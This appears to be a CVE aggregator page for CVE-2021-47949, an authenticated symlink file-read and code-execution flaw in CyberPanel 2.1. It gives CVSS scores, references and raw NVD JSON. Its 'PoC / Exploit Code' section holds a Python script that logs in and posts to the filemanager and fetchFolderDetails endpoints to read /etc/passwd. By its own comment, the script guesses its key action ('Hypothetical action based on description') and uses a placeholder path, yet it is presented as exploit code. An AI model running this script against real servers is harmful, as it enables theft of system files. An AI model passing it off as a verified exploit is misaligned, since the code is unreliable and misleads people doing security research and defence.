CVE-2021-47949

Description

CyberPanel 2.1 contains a command execution vulnerability that allows authenticated attackers to read arbitrary files and execute remote code by exploiting symlink attacks through the filemanager controller endpoint. Attackers can manipulate the completeStartingPath parameter in POST requests to /filemanager/controller to create symbolic links, read sensitive files like database credentials, and execute arbitrary shell commands through the /websites/fetchFolderDetails endpoint.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

CyberPanel 2.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "http://target-host:8090"
username = "attacker"
password = "password"

session = requests.Session()

# 1. Authenticate (Login)
login_data = {
    "username": username,
    "password": password
}
login_resp = session.post(f"{target_url}/login", data=login_data)
if login_resp.status_code != 200:
    print("Login failed")
    exit()

# 2. Exploit: Create malicious symlink via filemanager controller
# Manipulating 'completeStartingPath' to create a symlink to a sensitive file
exploit_url = f"{target_url}/filemanager/controller"
payload = {
    "completeStartingPath": "/etc/passwd",  # Target sensitive file
    "action": "createSymlink"                # Hypothetical action based on description
}

response = session.post(exploit_url, data=payload)
print(f"Symlink creation status: {response.status_code}")

# 3. Trigger: Read file via fetchFolderDetails
# Accessing the endpoint that triggers the symlink resolution
trigger_url = f"{target_url}/websites/fetchFolderDetails"
read_data = {
    "path": "/path/to/malicious/symlink"
}

file_content = session.post(trigger_url, data=read_data)
print("Sensitive file content:")
print(file_content.text)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47949
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47949
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47949/
[4] VulDB https://vuldb.com/cve/CVE-2021-47949
[5] https://cyberpanel.net/
[6] https://github.com/usmannasir/cyberpanel
[7] https://www.exploit-db.com/exploits/50230
[8] https://www.vulncheck.com/advisories/cyberpanel-authenticated-remote-code-execution-via-symlink-attack

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47949", "sourceIdentifier": "[email protected]", "published": "2026-05-10T13:16:31.453", "lastModified": "2026-05-13T15:29:03.597", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "CyberPanel 2.1 contains a command execution vulnerability that allows authenticated attackers to read arbitrary files and execute remote code by exploiting symlink attacks through the filemanager controller endpoint. Attackers can manipulate the completeStartingPath parameter in POST requests to /filemanager/controller to create symbolic links, read sensitive files like database credentials, and execute arbitrary shell commands through the /websites/fetchFolderDetails endpoint."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-59"}]}], "references": [{"url": "https://cyberpanel.net/", "source": "[email protected]"}, {"url": "https://github.com/usmannasir/cyberpanel", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50230", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/cyberpanel-authenticated-remote-code-execution-via-symlink-attack", "source": "[email protected]"}]}}